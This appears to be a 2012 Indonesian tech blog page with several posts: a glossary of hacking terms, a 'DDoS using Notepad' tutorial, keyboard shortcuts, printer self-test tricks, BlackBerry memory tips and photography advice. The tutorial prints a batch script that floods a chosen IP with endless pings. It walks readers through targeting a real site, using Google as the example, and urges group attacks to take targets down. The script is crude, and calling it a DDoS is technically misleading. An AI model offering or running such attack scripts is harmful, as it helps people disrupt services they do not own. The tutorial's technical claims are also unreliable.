Ini Dia, 10 Versi Windows 8 Terbaru

Menurut Microsoft, sudah lebih dari 1 juta orang telah men-download software Windows 8 Consumer Preview.

Sabtu, 18 Agustus 2012

Kamus Hacker, Istilah Hacker


1. Back Orifice: software buatan kelompok hacker ( Cult of the Dead Cow ) yang digunakan sebagai alat bantu untuk menemukan jalan masuk ke sebuah komputer dan mengendalikannya dari jarak jauh (remote). Versi terakhir yang muncul adalah Back Orifice 2000 yang mampu secara virtual mengendalikan sebuah komputer lain dengan sistem operasi Windows. Untuk bisa menggunakannya hacker harus melakukan langkah curang sedemikian rupa sehingga calon korban menerima dan menjalankan Trojan horse (TH) dalam komputernya.TH ini lazimnya diselipkan (attach file lewat email) dalam sebuah file yang tidak berpenampilan jahat namun sebenarnya mengandung program Back Orifice server tersembunyi di balik itu.
Kalau Back Orifice berhasil terinstall di komputer korban maka bisa dipastikan hacker bisa melakukan banyak hal termasuk mengendalikan (kontrol) komputer korban dari jauh. Dari hanya sekedar melihat, menghapus, menambah file sampai merubah tampilan desktop bisa dilakukan hacker pada komputer korbannya.

2. Black hat: kalau anda anggap www itu analogi wild, wild west maka anda tentu sudah bisa menebak tentu black hat ini ada di pihak yang jahat. Hacker black hat ini juga biasa disebut sebagai aka crackers” dengan kemampuan mencuri data atau merusak sistem yang ada dalam komputer korban. Kelebihan black hat adalah kemampuannya untuk menghilangkan jejak hingga tidak bisa dilacak siapa sebenarnya pelaku serangan yang terjadi setelah tujuan tertentu mereka terpenuhi.

3. Buffer overflow: ini adalah sebuah kelemahan yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara perintah yang mereka dapat di memori tertentu yang biasa disebut buffer memory. Kalau OS atau program tidak bisa dikode secara sempurna maka hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan perintah yang dibuat khusus yang membuat gangguan jadi berlangsung lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan serangan seperti buffer overflow yang banyak dilancarkan lewat internet ini.
Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer. Namun terkadang hacker masih sering melakukannya untuk memperlambat kinerja sebuah situs.

4. Denial-of-service attack : adalah sebuah istilah yang diberikan untuk upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Serangan seperti ini bertujuan membuat server korban jadi kuwalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request.

5. Distributed denial-of-service attack (DdoS): di masa lalu hacker hanya bisa melancarkan serangan denial-of-service attack dengan mengirimkan request dalam jumlah besar secara simultan dan kontinyu dari sebuah komputer. Namun sekarang hacker bisa mengirimkan serangan dari beberapa komputer yang diaktifkan secara remote. Pada tahun 1998 sebuah kelompok hacker menciptakan program yang memungkinkan seorang hacker mengirimkan sebuah perintah dalam jumlah besar ke komputer korban yang lain agar bisa dikendalikan secara remote. Setelah beberapa komputer korban ada dalam kendalinya, secara bersamaan komputer korban tersebut dikoordinir untuk melancarkan denial-of-service attack kepada korban lain yang menjadi target utama.
Layaknya zombie beberapa komputer yang menjadi korban sebelumnya dikendalikan secara remote untuk melakukan request secara kontinyu dan simultan ke komputer target utama. Serangan serupa DdoS ini sudah
terbukti berhasil melumpuhkan beberapa web server milik situs besar kenamaan seperti Yahoo.com dan eTrade.com. Namun dengan sebuah software pendeteksi dan pengalaman yang cukup admin jaringan di beberapa jaringan besar sudah selayaknya mampu menangkal serangan seperti ini.

6. Exploit: ini merupakan sebuah ungkapan untuk keberadaan sebuah celah keamanan dalam software yang berjalan di sebuah komputer. Lewat exploit inilah peluang untuk melakukan serangan terbuka bagi hacker.
Setiap software atau sistem operasi baru dirilis maka pada saat yang sama genderang perang ditabuh untuk memberi komando pada hacker mulai mencari kelemahannya. Setiap ada kelemahan baru ditemukan oleh para hacker maka pengumuman akan segera tersebar lewat beberapa media yang menjadi forum komuniakasi mereka. Kebanyakan kabar tersebut akan disebarkan di beberapa mailing list seperti CERT, BugTraq, Microsoft’s security bulletins dan beberapa lagi lainnya. Dengan disebarkannya penemuan tersebut pembuat software bisa mengupayakan penangkalnya. Pemakai juga bisa jadi lebih waspada akan terjadinya serangan. Dalam kebanyakan kasus yang terjadi biasanya pemakai software kurang waspada akan kelemahan software yang dipakainya padahal kabar sudah disebar dan penangkal sudah bisa didapat.

7. Firewall: adalah sebuah software program yang dipasang pada sebuah jaringan dan bertugas menjadi penghalang bobolnya akses untuk kepentingan jahat layaknya sebuah saringan. Semua aktivitas keluar dan masuk ke jaringan harus melalui penyaringan ini hingga akses tertentu yang berbahaya bisa dibatasi. Saringan ini juga bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.

8. Hacktivism: adalah aktivitas penyerangan oleh hacker yang dimotivasi oleh simpati tertentu. Hal semacam ini muncul bila aktivis sosial maupun politik menggabungkan kemampuan menyerang yang dimiliki dan menggunakannya untuk kepentingan menarik simpati lebih besar atau unjuk rasa lewat internet.

9. Intrusion detection system (IDS): sama seperti firewall IDS ini merupakan penghambat semua niat jahat yang akan megganggu sebuah jaringan. Bedanya IDS ini lebih mau selangkah dengan kemampuannya memberi peringatan kepada admin server saat terjadi sebuah aktivitas tertentu yang tidak diinginkan admin sebagai penanggung jawab. Selainmemberi peringatan dini IDS juga memberi beberapa alat bantu untuk melacak jenis dan sumber aktivitas terlarang tersebut.

10. Root: istilah ini diadaptasi dari sitem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

11. Script kiddie: sebuah pola serangan yang sering dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk mendeface atau melancarkan DOS pada korban yang memiliki expolit. Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker permula yang menggunakan metode ini karena biasanya mereka hanya menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola serangan yang dilancarkan

12. Trojan horse: adalah sebuah aplikasi yang didesain untuk melakukan sebuah kecurangan namun terselubung dengan kebaikkan. Biasanya metoda yang dipakai adalah dengan menyelipkan (attach file lewat email) sebuah file tertentu yang mengandung trojan horse namun dengan kemasan menarik. Kalau trojan horse berhasil menginfeksi maka bisa dipastikan hacker bisa mendapat akses tak terhingga ke komputer korban. Tiga jenis trojan horse yang popular digunakan adalah Back Orifice, NetBus, dan SubSeven.

13. White hat: hacker dengan kategori ini cenderung lebih memanfaatkan pengetahuan mereka untuk memuaskan rasa ingin tahu bagi intelektualita ketimbang untuk perbuatan jahat yang merusak. Hacker seperti ini sangat nanti dengan perusakan sebuah sistem, pencurian data mauoun merusak kinerja sebuah situs. Namun aktivitas mereka tetap saja menjadi tidak legal bila mereka ingin menguji sebuah sistem milik orang lain yang dimana mereka tidak memiliki otoritas untuk itu. Dalam aktivitasnya tidak jarang mereka melakukan perusakan yang tidak disengaja seperti merubah atau menghapus data yang ada. Kebanyakan hacker seperti ini bekerja secara resmi diperusahaan tertentu sebagai programer, konsultan maupun admin server.

Selasa, 14 Agustus 2012

Attack Website (DDOS Menggunakan Notepad)


Langsung aja Gak pakai Lama Nih Tutor Nya Dibawah 

LANGKAH 1, Copy code-code dibawah ini :

Code:

@echo off
mode 67,16
title DDOS Attack By Ilham Aswad
color 0a
cls
echo.
echo DDOS With Batchfile By Ilham Aswad
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


LANGKAH 2 :Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3, Save file anda seperti dibawah :

File Name : DDoS Attack.bat Save As 

Type : All File <--- PENTING

Quote: bisa disave dgn namafile bebas sesuka bro n sist..tapi ingat , File Extensi harus berformat .BatCara-cara menggunakannya :1. Double click file anda itu.2. Akan tertera : Server-Target:Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

Quote:Contoh :Sebelum = http://www.google.com/Tukarkan kepada = www[.]google[.]com

*hilangkan tanda '[]'. Setelah memasukkan url itu, tekan enter.3. Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :


[209.85.175.106] with 32 bytes of data:Reply from 209.85.175.106: bytes=32 time=30ms TTL=56Reply from 209.85.175.106: bytes=32 time=40ms TTL=55Reply from 209.85.175.106: bytes=32 time=24ms TTL=56Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 24ms, Maximum = 40ms, Average = 32ms
209.85.175.106 <----- IP address bagi http://www.google.com
Quote : cara sama kok untuk web yg lain4. Selepas itu, akan terpapar di tool itu : ip Host : Masukkan saja ip address yg anda dapat tadi.

Contoh :ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size : Letakkan letakkan semau anda sebagai POWER !

Contoh :Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Quote : pengen hasil yg maksimal , harus ddos bareng2 , biar cepet down targetnya

Minggu, 12 Agustus 2012

Top 10 keyboard shortcuts everyone should know


Top 10 keyboard shortcuts
Using keyboard shortcuts can greatly increase your productivity, reduce repetitive strain, and help keep you focused. For example, highlighting text with the keyboard and pressing Ctrl + C is much faster than taking your hand from the keyboard, highlighting the text using the mouse, clicking copy from the file menu, and then putting your hand back in place on the keyboard. Below are our top 10 keyboard shortcuts we recommend everyone memorize and use.

Ctrl + C or Ctrl + Insert
  • Copy the highlighted text or selected item.
Ctrl + V or Shift + Insert
  • Paste the text or object that's in the clipboard.
Ctrl + Z and Ctrl + Y
  • Undo any change. For example, if you cut text, pressing this will undo it. This can also often be pressed multiple times to undo multiple changes. Pressing Ctrl + Y would redo the undo.
Ctrl + F
  • Open the Find in any program. This includes your Internet browser to find text on the current page.
Alt + Tab or Alt + Esc
  • Quickly switch between open programs moving forward.
  • Tip: Press Ctrl + Tab to switch between tabs in a program.
  • Tip: Adding the Shift key to Alt + Tab or Ctrl + Tab will move backwards. For example, if you are pressing Alt + Tab and pass the program you want to switch to, press Alt + Shift + Tab to move backwards to that program.
  • Tip: Windows Vista and 7 users can also press the Windows Key + Tab to switch through open programs in a full screenshot of the Window.
Ctrl + Back space and Ctrl + Left or Right arrow
  • Pressing Ctrl + Backspace will delete a full word at a time instead of a single character.
  • Holding down the Ctrl key while pressing the left or right arrow will move the cursor one word at a time instead of one character at a time. If you wanted to highlight one word at a time you can hold down Ctrl + Shift and then press the left or right arrow key to move one word at a time in that direction while highlighting each word.
Ctrl + S
  • While working on a document or other file in almost every program pressing Ctrl + S will save that file. This shortcut key should be used frequently anytime you're working on anything important.
Ctrl + Home or Ctrl + End
  • Move the cursor to the beginning or end of a document.
Ctrl + P
  • Print the page being viewed. For example, the document in Microsoft Word or the web page in your Internet browser.
Page Up, Space bar, and Page Down
  • Pressing either the page up or page down key will move that page one page at a time in that direction. When browsing the Internet pressing the space bar will also move the page down one page at a time. If you press Shift and the Space bar the page will go up a page at a time.

Selasa, 07 Agustus 2012

Cara Self Test Printer HP dan Canon



Jika anda seorang tehnisi komputer ataupun anda yang sedang berusaha memperbaiki printer anda sendiri, mungkin trik ini akan sangat berguna bagi anda untuk mempercepat pekerjaan servis anda. Trik kali ini adalah tentang Cara Self Test Printer HP dan Canon. Dengan menggunakan trik self test printer ini, anda tidak perlu menggunakan komputer ataupun laptop untuk melakukan test print printer HP dan Canon anda. Anda hanya cukup menggunakan konfigurasi tombol yang ada di printer anda.

Cara Self Test Printer HP D2566 :
  • Siapkan kertas 1-2 lembar di paper tray HP D2566
  • Hidupkan Printer HP D2566 anda.
  • Tekan tombol power dan tahan jangan di lepaskan. ( karena kalau dilepaskan printer akan mati )
  • Kemudian tekan tombol panah (resume) 4x (empat kali)
  • Kemudian lepas tombol power HP D2566 tersebut, dan HP D2566 akan melakukan self test print.
Cara Self  Test Printer HP 3325, 3535, 3744, 3920, 3940, 2466 :
  • Siapkan kertas 1-2 lembar di paper tray printer HP anda
  • Hidupkan Printer HP anda.
  • Tekan tombol power dan tahan jangan di lepaskan. ( karena kalau dilepaskan printer akan mati )
  • Kemudian lakukan “buka-tutup” cover printer atau tutupnya printer 4x (empat kali “buka-tutup”), jangan sampai kurang dengan kondisi terakhir printer menutup,
  • Kemudian lepas tombol power printer HP anda, dan printer HP anda akan melakukan self test print.
Cara Self  Test Printer Canon IP1200, IP1300, IP1600, IP1700, IP1880, IP1980, dll :
  • Siapkan kertas 1-2 lembar di paper tray printer Canon anda
  • Hidupkan Printer Canon anda.
  • Tekan-tekan tombol resume 4x (empat kali)  secara cepat,  jangan sampai kurang.
  • Dan printer Canon anda akan mulai melakukan self test print.

Minggu, 05 Agustus 2012

Tips Bikin Lega Memori BlackBerry

BlackBerry (ash/inet)

BlackBerry masih menjadi primadona di pasar ponsel Indonesia. Sayang, sering kali ponsel besutan Research In Motion (RIM) ini dikeluhkan beroperasi terlalu lambat.

Ada yang bilang memori di BlackBerry Anda sudah penuh, sehingga harus sering-sering dibersihkan agar lapang.

Nah, pertanyaannya adalah, pernahkah Anda mengecek penggunaan memori BlackBerry Anda? Pasti banyak yang menjawab tidak.

Biasanya untuk BlackBerry keluaran lama seperti Bold 9000 yang masih menggunakan memori aplikasi internal sebesar 128 Mb, akan sering terjadi yang namanya memory drained. Apalagi bila Anda menginstall aplikasi yang cukup banyak dan banyak email lama yang tidak dihapus.

Di sini kami ingin berbagi tips bagaimana cara merawat memori BlackBerry Anda agar tidak mudah kehabisan tempat alias memory drained. Berikut tipsnya:

-. Biasakan agar selalu menghapus email-email yang sudah tidak dibaca. Set email untuk tetap tersimpan di BlackBerry selama 15 hari, setelah itu akan terhapus sendirinya.

-. Browser cache sebaiknya dibersihkan seperti contect cache, pushed content dan cookie cache. Caranya, masuk browser lalu masuk ke Option, cari Clear Browsing Data.

-. Untuk aplikasi yang lumayan berat, seperti Facebook atau twitter client seperti UberSocial rajin-rajinlah cache memori. (masuk ke option).

-. Lakukan Memory Cleaning yang pilihannya juga terdapat di Option.

-. Lakukan juga clear log (alt + L + G + L + G) meskipun tidak berpengaruh banyak, tetapi lumayan membantu.

-. Selalu end conversation (kecuali kalau penting) apabila sudah selesai chat di BBM.

-. Lakukan soft reset dengan menekan 'alt + aA + del'.

-. Selalu Simpan foto, MP3 dan data-data penting lainnya di media card.

-. Bagi yang menggunakan BBM v5.0.0.xx agar tidak mengaktifkan 'recent updates' karena akan memakan memori cache sehingga sangat cepat memori drained.

-. Yang paling penting, rajin-rajinlah reboot BlackBerry atau cabut baterai paling kurang 1 hari sekali.

Semoga tips di atas berguna...

Tips Membuat Foto Luar Biasa dengan Multiple Exposure

(6 adegan anggar Olimpiade London dalam 1 frame/Reuters-Max Rossi)
Teknik memotret dengan gaya multiple exposure bukan barang baru, bahkan sudah didalami sejak zaman film. Teknik ini biasa digunakan untuk dua atau lebih adegan gerak ataupun diam dalam sebuah frame. Tujuannya tidak lain supaya gambar terlihat lebih dramatis dan dinamis.
Nah, dalam beberapa hari belakangan, fotografer yang bertugas di Olimpiade London kerap menggunakan teknik tersebut. Ada yang berpendapat gambar yang dihasilkan menjadi lebih heroik namun ada yang menilai foto tersebut cukup membosankan.

Bagaimana sebenarnya membuat foto dengan multiple exposure ini?

Pertama, syarat mutlak adalah jenis kamera. Ternyata tidak semua kamera digital mempunyai fasilitas atau feature multiple exposure. Kalaupun tidak memiliki namun ingin mencobanya, berarti memerlukan olah digital lewat piranti lunak komputer. Yakni dengan menggabungkan beberapa layer/lapis yang ditumpuk menjadi satu frame.

Sebagai catatan, tulisan ini mengupas multiple exposure yang dibuat di internal kamera, bukan di komputer.

Kedua, pastikan kondisi cahaya menjamin suksesnya multiple exposure. Background foto harus lebih gelap dari subjek. Hal ini untuk menjaga speed dan diafragma terjaga saat merekam beberapa adegan.

Cahaya yang jatuh di subjek juga perlu konstan, tidak berubah-ubah. Kebutuhan ini untuk menjaga auto fokus tidak lari dan lightmeter terjaga.

Ketiga, tentukan berapa frame yang akan ditumpuk dalam satu frame. Biasanya kamera menyediakan fasilitas 2 hingga 10 frame. Banyak sedikitnya adegan yang terekam tergantung kreatifitas fotografer.

Keempat. Perhatikan baik-baik apa yang akan dibuat multiple exposure. Sesuaikan dengan kebutuhan foto karena tidak semua adegan bagus untuk dibuat multiple. Di sini, nalar dan sisi kreatif fotografer sangat berperan penting dalam membuat sebuah foto multiple.

Keempat. Karena tujuan multiple exposure membuat suatu adegan lebih hidup dan dramatis, tetap perhatikan bahasa tubuh dan ekpresi subjek yang hendak dijepret. Jangan sampai keduanya tertutup oleh banyaknya layer yang ditumpuk.

Kelima, latih kemampuan multiple secara terus menerus dan berulang-ulang. Latihan ini diperlukan karena multiple memerlukan teknik dan cita rasa yang cukup tinggi.

Sebagai catatan, multiple ini cukup menguras shutter count di kamera Anda. Pun demikian, hasil yang luar biasa akan membuat bersemangat, bukan?

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites